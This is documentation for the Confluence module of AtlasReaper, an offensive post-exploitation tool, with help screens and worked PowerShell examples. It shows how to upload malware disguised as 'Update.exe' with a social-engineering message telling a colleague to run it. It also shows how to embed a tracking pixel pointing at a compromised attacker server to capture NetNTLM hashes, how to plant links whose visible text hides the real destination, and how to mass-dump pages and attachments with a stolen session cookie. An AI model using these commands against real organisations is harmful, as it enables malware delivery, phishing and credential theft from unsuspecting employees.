Confluence

Confluence Subcommands

The confluence command contains several subcommands.

PS C:\> .\AtlasReaper.exe confluence --help

                                                   .@@@@
                                               @@@@@
                                            @@@@@   @@@@@@@
                                          @@@@@   @@@@@@@@@@@
                                         @@@@@  @@@@@@@@@@@@@@@
                                        @@@@,  @@@@        *@@@@
                                          @@@@ @@@  @@  @@@ .@@@
   _  _   _         ___                       @@@@@@@     @@@@@@
  /_\| |_| |__ _ __| _ \___ __ _ _ __  ___ _ _   @@   @@@@@@@@
 / _ \  _| / _` (_-<   / -_) _` | '_ \/ -_) '_|  @@   @@@@@@@@
/_/ \_\__|_\__,_/__/_|_\___\__,_| .__/\___|_|    @@@@@@@@   &@
                                |_|             @@@@@@@@@@  @@&
                                                @@@@@@@@@@@@@@@@@
                                               @@@@@@@@@@@@@@@@. @@
                                                  @werdhaihai
AtlasReaper 1.0.0.0

  attach             Attach a file to a page

  download           Download Attachment

  embed              Embed a 1x1 pixel image to perform farming attacks

  link               Add link to page

  listattachments    List Attachments

  listpages          List pages

  listspaces         List spaces

  search             Search Confluence

  help               Display more information on a specific command.

  version            Display version information.

Attach

The attach subcommand can be used to attach files to pages, and optionally provide a message for additional context.

Help

PS C:\> .\AtlasReaper.exe confluence attach --help

AtlasReaper 1.0.0.0

  -a, --attachment    Attachment Id to attach to page (if attachment is already created)

  --at                User id to @ on the page (get user id from the jira listusers command)

  --comment           (Default: untitled) Comment for uploaded file

  -f, --file          File to attach

  -n, --name          Name of file attachment. (Defaults to filename passed with -f/--file

  -p, --page          Required. Page to attach

  -t, --text          Text to add to page to provide context (e.g "I uploaded this file, please take a look")

  -u, --url           Required. Confluence URL

  -c, --cookie        cloud.session.token

  -o, --output        Save output to file

  --help              Display this help screen.

  --version           Display version information.

Example

This example attaches C:\Windows\Tasks\Malware.exe to the page 57657264 and names the file Update.exe. The example will also @/mention the user with the 8930955 and adds the text (-t/--text) to provide context for the attachment.

PS C:\> .\AtlasReaper.exe confluence attach `
    -f "C:\Windows\Tasks\Malware.exe" `
    -n Update.exe `
    -p 57657264 `
    --at 8930955 `
    -t "I'm attaching the updater we need to run on each system to bring all systems in the environment into compliance." `
    -u $URL `
    -c $COOKIE

Embed

The embed subcommand is used to trigger NetNTLMv1/v2 authentication by embedding a 1x1 pixel image hosted on an attacker controlled server running a tool such as Responder or SharpWebServer.

Help

PS C:\> .\AtlasReaper.exe confluence embed --help

AtlasReaper 1.0.0.0

  --at             User id to @ on the page (get user id from the jira listusers command)

  -l, --link       Required. Url to listener

  -m, --message    Messgage to add to the page (i.e. I need you to take a look at this)

  -p, --page       Required. Page to embed

  -u, --url        Required. Confluence URL

  -c, --cookie     cloud.session.token

  -o, --output     Save output to file

  --help           Display this help screen.

  --version        Display version information.

Example

This example uses the embed subcommand to embed a 1x1 pixel image on the 57657264 page. In this example, a compromised server, http://jenkins.stricklandpropane.corp, is running a tool for negotiating NetNTLMv1/v2 authentication. When users browse to the Confluence page, their browser will attempt to load the image, and if Integrated Windows Authentication is enabled, the browser will automatically send the hash. It is possible to @/mention users and include a message.

PS C:\> .\AtlasReaper.exe confluence embed `
	-p 57657264 `
	-l "http://jenkins.stricklandpropane.corp/logo.jpeg `
	--at 8930955 `
	-m "Is this page out of date?" `
	-u $URL `
	-c $COOKIE

Link

The link subcommand can be used to create a link on pages. It is possible to set the link text to a site that appears different from the actual href, to convince a user to go to a site they did not intend to. Optionally, you can @/mention users and include a message for context.

NOTE: If the link text looks like a url (e.g. it starts with http:// or https://), Confluence will display a warning to the user that they are actually going to a different site. This may be possible to bypass.

Help

PS C:\> .\AtlasReaper.exe confluence link --help

AtlasReaper 1.0.0.0

  --at             User id to @ on the page (get user id from the jira listusers command)

  -l, --link       Required. Url to link to

  -m, --message    Messgage to add to the page (i.e. I need you to take a look at this)

  -p, --page       Required. Page to embed

  -t, --text       (Default: Here) Link text to display

  -u, --url        Required. Confluence URL

  -c, --cookie     cloud.session.token

  -o, --output     Save output to file

  --help           Display this help screen.

  --version        Display version information.

Example

In this example, a link is added to the 57657264. The link text is https://stricklandpropane.corp which the user will see, they will actually be sent to http://jenkins.stricklandpropane.corp/?redir=https://stricklandpropane.corp.

The Jenkins server in this example has been compromised and is running SharpWebServer with the redir option. Using this option will first negotiate NetNTLMV1/v2 authentication, then redirect the user to the site specified in the redir URL parameter (https://stricklandpropane.corp).

Additionally, a user with the Id 8930955 is mentioned and a message is used with the -m flag.

PS C:\> .\AtlasReaper.exe confluence link `
	-p 57657264 `
	-l http://jenkins.stricklandpropane.corp/?redir=https://stricklandpropane.corp `
	-t https://stricklandpropane.corp `
	--at 8930955 `
	-m "Is this the correct link for here?" `
	-u $URL `
	-c $COOKIE `

ListAttachments

The listattachments subcommand can be used to list attachments with several options for filtering. Using the --all-spaces flag can generate a lot of requests. Using the -i/--include or -x/-exclude flags allow for include or excluding files based on file extension. For multiple extensions a comma-separated list can be used.

Help

PS C:\> .\AtlasReaper.exe confluence listattachments --help

AtlasReaper 1.0.0.0

  -a, --all        (Default: false) Return all attachments for supplied space

  --all-spaces     (Default: false) Return attachments for all spaces. WARNING!! This can make a lot of requests!

  -i, --include    Comma-separated list of extensions to include (e.g. png,jpeg)

  -l, --limit      (Default: 200) Number or attachments to return

  -p, --page       Page to return attachments for

  -s, --space      Space to return attachments for

  -x, --exclude    Comma-separated list of extensions to exclude (e.g. png,jpeg)

  -u, --url        Required. Confluence URL

  -c, --cookie     cloud.session.token

  -o, --output     Save output to file

  --help           Display this help screen.

  --version        Display version information.

Example

This example lists every attachment, excluding files with the png extension, for all spaces in the tenant and outputs the results to a file, C:\Windows\Tasks\attachments.txt.

PS C:\> .\AtlasReaper.exe confluence listattachments `
	--all-spaces `
	-x png `
	-o "C:\Windows\Tasks\attachments.txt"
	-u $URL `
	-c $COOKIE

ListPages

To return pages from a given space or all spaces, use the listpages subcommand. The -b/--body switch will return a "readable" format of the page's contents. The --all option can be used to dump all pages.

NOTE: The --all option will potentially need to make a lot of web requests as it tries to retrieve all of the pages. This can result in a large amount of data being returned, especially if used without -s/--space or with -b/--body

Help

PS C:\> .\AtlasReaper.exe confluence listpages --help

AtlasReaper 1.0.0.0

  --all           (Default: false) Return all pages (Returns every Page if no Space is specified)

  -b, --body      (Default: false) Print body of pages

  -l, --limit     (Default: 250) Number of results to return

  -p, --page      Page to return

  -s, --space     Space to search

  --status        Page Status (current, archived, deleted, trashed) Defaults to all

  -u, --url       Required. Confluence URL

  -c, --cookie    cloud.session.token

  -o, --output    Save output to file

  --help          Display this help screen.

  --version       Display version information.

Example

Returning all pages for a specific space.

PS C:\> .\AtlasReaper.exe confluence listpages -u $URL -c $COOKIE -s 2403816 --all

Authenticated as: Hank Hill
Page Title: IT
Updated   : 2023-06-21T00:01:38.450Z
Page Id   : 57657261

Page Title: Get the most out of your team space
Updated   : 2023-06-21T00:01:38.365Z
Page Id   : 57657262

Page Title: IT change management
Updated   : 2023-06-21T00:01:38.266Z
Page Id   : 57657264

Page Title: IT project poster
Updated   : 2023-06-21T00:01:38.175Z
Page Id   : 57657271

Returning a specific page and it's body.

PS C:\> .\AtlasReaper.exe confluence listpages -u $URL -c $COOKIE -p 3408072 --body

Authenticated as: Hank Hill
Page Title: IT
Updated   : 2023-06-21T00:01:38.450Z
Page Id   : 3408072
Page Body :
                Welcome to your IT team space!
                You're in the space
                overview
                . It's what visitors first see, like a landing page for your space
                Click ?? Edit to customize your overview
                A space contains
                pages

ListSpaces

The listspaces subcommand will list the spaces in Confluene. It has a few options including one to filter the type of space returned. By default a personal space is created for all new users.

Help

PS C:\> .\AtlasReaper.exe confluence listspaces --help

AtlasReaper 1.0.0.0

  --all           (Default: false) Returns all spaces

  -l, --limit     (Default: 100) Number of results to return

  -s, --space     Space to search

  -t, --type      Space type to return (global, personal, ...?)

  -u, --url       Required. Confluence URL

  -c, --cookie    cloud.session.token

  -o, --output    Save output to file

  --help          Display this help screen.

  --version       Display version information.

Example

PS C:\> .\AtlasReaper.exe confluence listspaces -u $URL -c $COOKIE

Authenticated as: Hank Hill
    Space Name  : IT
    Space Id    : 2403816
    Space Key   : IT
    Space Type  : global
    Space Status: current

    Space Name  : FINANCE
    Space Id    : 2664114
    Space Key   : FINANCE
    Space Type  : global
    Space Status: current

    Space Name  : HR
    Space Id    : 3604801
    Space Key   : HR
    Space Type  : global
    Space Status: current

    Space Name  : DEV
    Space Id    : 8091384
    Space Key   : DEV
    Space Type  : global
    Space Status: current

    Space Name  : Hank Hill
    Space Id    : 98306
    Space Key   : ~897452e18ead890e8a
    Space Type  : personal
    Space Status: current

Search

Help

PS C:\> .\AtlasReaper.exe confluence search --help

AtlasReaper 1.0.0.0

  -a, --all       (Default: false) Return all matches

  -l, --limit     (Default: 250) Number of results to return

  -q, --query     Required. String or phrase to query

  -u, --url       Required. Confluence URL

  -c, --cookie    cloud.session.token

  -o, --output    Save output to file

  --help          Display this help screen.

  --version       Display version information.

Example